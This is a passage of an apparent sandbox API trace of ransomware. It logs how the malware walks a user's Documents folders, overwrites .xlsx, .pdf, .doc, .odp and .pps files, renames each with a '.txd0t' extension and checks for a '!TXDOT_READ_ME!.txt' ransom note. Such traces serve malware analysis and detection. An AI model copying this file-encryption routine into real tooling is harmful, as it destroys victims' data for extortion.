(pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx") returned="aayLh9Av.xlsx" [0074.056] StrCpyW (in: psz1=0xecf3cc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.056] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.057] GetProcessHeap () returned 0xe30000 [0074.057] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf390 | out: hHeap=0xe30000) returned 1 [0074.057] CloseHandle (hObject=0x47c) returned 1 [0074.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\aaylh9av.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\aaylh9av.xlsx.txd0t")) returned 1 [0074.059] SetEvent (hEvent=0x3f8) returned 1 [0074.059] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.075] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" [0074.075] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t" [0074.075] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t") returned 0 [0074.076] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx", dwFileAttributes=0x80) returned 1 [0074.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\gaae08.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.076] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=77497) returned 1 [0074.076] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.076] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.077] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffecf47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.077] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x12eb0, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x12eb0, lpOverlapped=0x0) returned 1 [0074.079] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffed150, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.079] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x12eb0, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x12eb0, lpOverlapped=0x0) returned 1 [0074.079] FlushFileBuffers (hFile=0x460) returned 1 [0074.339] GetProcessHeap () returned 0xe30000 [0074.584] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfa) returned 0xecfde0 [0074.608] StrCpyW (in: psz1=0xecfde0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" [0074.608] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx") returned="gaAE08.xlsx" [0074.609] StrCpyW (in: psz1=0xecfe1c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.610] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.633] GetProcessHeap () returned 0xe30000 [0074.633] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfde0 | out: hHeap=0xe30000) returned 1 [0074.633] CloseHandle (hObject=0x460) returned 1 [0074.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\gaae08.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\gaae08.xlsx.txd0t")) returned 1 [0074.636] SetEvent (hEvent=0x3f8) returned 1 [0074.637] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.637] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" [0074.637] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t" [0074.637] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t") returned 0 [0074.638] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf", dwFileAttributes=0x80) returned 1 [0074.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\j7-b.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.638] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=18828) returned 1 [0074.638] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.638] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.639] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb474, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.639] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4980, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x4980, lpOverlapped=0x0) returned 1 [0074.639] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.639] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4980, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x4980, lpOverlapped=0x0) returned 1 [0074.640] FlushFileBuffers (hFile=0x460) returned 1 [0074.641] GetProcessHeap () returned 0xe30000 [0074.641] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xe9b648 [0074.641] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" [0074.641] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf") returned="j7-b.pdf" [0074.641] StrCpyW (in: psz1=0xe9b6b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.642] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned 1 [0074.642] GetProcessHeap () returned 0xe30000 [0074.642] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.642] CloseHandle (hObject=0x460) returned 1 [0074.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\j7-b.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\j7-b.pdf.txd0t")) returned 1 [0074.643] SetEvent (hEvent=0x3f8) returned 1 [0074.644] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.645] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" [0074.645] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t" [0074.645] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t") returned 0 [0074.645] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc", dwFileAttributes=0x80) returned 1 [0074.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\lfpwuqj-af.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.645] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=29380) returned 1 [0074.645] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.645] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.646] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff8b3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.646] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x72c0, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x72c0, lpOverlapped=0x0) returned 1 [0074.647] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff8d40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.647] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x72c0, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x72c0, lpOverlapped=0x0) returned 1 [0074.647] FlushFileBuffers (hFile=0x460) returned 1 [0074.649] GetProcessHeap () returned 0xe30000 [0074.649] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xe9b648 [0074.649] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" [0074.649] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc") returned="LFpWuQJ-aF.doc" [0074.649] StrCpyW (in: psz1=0xe9b6b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.649] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned 1 [0074.649] GetProcessHeap () returned 0xe30000 [0074.649] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.649] CloseHandle (hObject=0x460) returned 1 [0074.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\lfpwuqj-af.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\lfpwuqj-af.doc.txd0t")) returned 1 [0074.651] SetEvent (hEvent=0x3f8) returned 1 [0074.651] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.652] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" [0074.652] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t" [0074.652] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t") returned 0 [0074.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp", dwFileAttributes=0x80) returned 1 [0074.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\wuuiqi1na.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.653] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=44299) returned 1 [0074.653] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.653] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.654] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff50f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.654] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xad00, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0xad00, lpOverlapped=0x0) returned 1 [0074.655] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff5300, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.655] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xad00, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0xad00, lpOverlapped=0x0) returned 1 [0074.656] FlushFileBuffers (hFile=0x468) returned 1 [0074.658] GetProcessHeap () returned 0xe30000 [0074.658] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12e) returned 0xe9b648 [0074.658] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" [0074.658] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp") returned="wUuIQI1na.odp" [0074.658] StrCpyW (in: psz1=0xe9b6b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.658] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned 1 [0074.658] GetProcessHeap () returned 0xe30000 [0074.658] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.658] CloseHandle (hObject=0x468) returned 1 [0074.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\wuuiqi1na.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\wuuiqi1na.odp.txd0t")) returned 1 [0074.660] SetEvent (hEvent=0x3f8) returned 1 [0074.660] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.663] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" [0074.663] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t" [0074.663] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t") returned 0 [0074.663] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps", dwFileAttributes=0x80) returned 1 [0074.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\xuawupfvosfqe.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.663] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=68730) returned 1 [0074.663] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.663] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.664] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef186, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.664] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x10c70, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x10c70, lpOverlapped=0x0) returned 1 [0074.666] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef390, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.666] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x10c70, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x10c70, lpOverlapped=0x0) returned 1 [0074.666] FlushFileBuffers (hFile=0x460) returned 1 [0074.669] GetProcessHeap () returned 0xe30000 [0074.669] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xe9b648 [0074.669] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" [0074.669] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps") returned="xuaWupFvOSfqE.pps" [0074.670] StrCpyW (in: psz1=0xe9b69e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.670] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned 1 [0074.670] GetProcessHeap () returned 0xe30000 [0074.670] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.670] CloseHandle (hObject=0x460) returned 1 [0074.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\xuawupfvosfqe.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\xuawupfvosfqe.pps.txd0t")) returned 1 [0074.672] SetEvent (hEvent=0x3f8) returned 1 [0074.672] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.674] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" [0074.674] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t") 